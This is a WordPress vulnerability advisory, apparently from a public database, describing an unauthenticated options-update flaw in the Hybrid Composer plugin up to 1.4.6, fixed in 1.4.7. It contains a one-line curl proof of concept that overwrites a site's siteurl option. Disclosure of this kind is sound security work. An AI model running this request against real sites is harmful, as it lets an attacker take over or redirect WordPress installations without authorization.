Hybrid Composer <= 1.4.6 - Unauthenticated Options Update



Description
This plugin has a function to update Wordpress options via Ajax and it's set with the following:
add_action('wp_ajax_nopriv_hc_ajax_save_option', 'hc_ajax_save_option');

Which means it does not require authentication and is exploitable by anyone on the internet.

I've already spoken to the plugin author about this and he has patched the plugin and notified his users.

http://wordpress.framework-y.com/hybrid-composer/
Proof of Concept
curl -X POST -d "option_name=siteurl&content=https://www.google.com" 'https://DOMAIN.COM/wp-admin/admin-ajax.php?action=hc_ajax_save_option'

Affects Plugin

fixed in version 1.4.7

References

EXPLOITDB 47154
URL https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/

Classification

Type BYPASS

Miscellaneous

Original Researcher rootetsy
Submitter Brad Patton
Views 5001
Verified Yes
WPVDB ID 9452

Timeline

Publicly Published 2019-07-10 (4 months ago)
Added 2019-07-12 (4 months ago)
Last Updated 2019-07-28 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin